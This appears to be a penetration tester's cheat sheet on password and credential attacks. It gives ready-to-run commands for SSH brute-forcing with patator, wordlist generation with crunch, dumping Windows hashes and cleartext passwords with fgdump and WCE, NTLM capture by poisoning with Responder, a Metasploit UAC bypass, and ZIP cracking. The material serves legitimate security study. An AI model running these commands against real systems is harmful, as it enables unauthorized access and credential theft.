Passwords & credentials

Related

Wordlists and dictionaries

Online cracker

• CrackStation

• rumkin.com

Online attacks

patator.py

Patator is a multi-purpose brute-forcer, with a modular design and a flexible usage. GitHub - lanjelot/patator

python -W ignore patator.py ssh_login host=<ip> user=FILE0 0=/root/usernames password=Pass.txt

Tools

• Hashcat

• John the Ripper (JTR)

identify hash

• Hashes.com

hashid <hash>

hash-identifier

Key spaced brute force

crunch

crunch 6 6 0123456789ABCDEF -o crunch1.txt

Pre-defined character set

crunch 4 4 -f /usr/share/crunch/charset.lst mixalpha

More customized passwords

@ - Lower case alpha characters
, - Upper case alpha characters
% - Numeric characters
^ - Special characters including space 

crunch 8 8 -t ,@@^^%%%

fgdump

In memory attack (injecting dll), for system passwords

fgdump.exe
type 127.0.0.1.pwdump

Alternative: Pwdump

Windows Credentials Editor (WCE)

Windows Credentials Editor (WCE) is a security tool to list logon sessions and add, change, list and delete associated credentials (ex.: LM/NT hashes, plaintext passwords and Kerberos tickets).

Download Site

List logon sessions

wce -l

Dump clear text passwords

wce -w

responder.py (windows creds)

Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP_SMB_MSSQL_FTP_LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication. GitHub - lgandx/Responder

python ./Responder.py -i <own-ip> -b Off -r Off -w On

bypassuac

Used to bypass UAC post exploitation http://thehackerplaybook.com/Download/bypassuac.zip

run bypassuac
background
session -i 2
getsystem

Specific services, apps, files

fcrackzip

A braindead program for cracking encrypted ZIP archives. Forked from http://oldhome.schmorp.de/marc/fcrackzip.html GitHub - hyc/fcrackzip

fcrackzip -u -D -p <file-with-pws> file.zip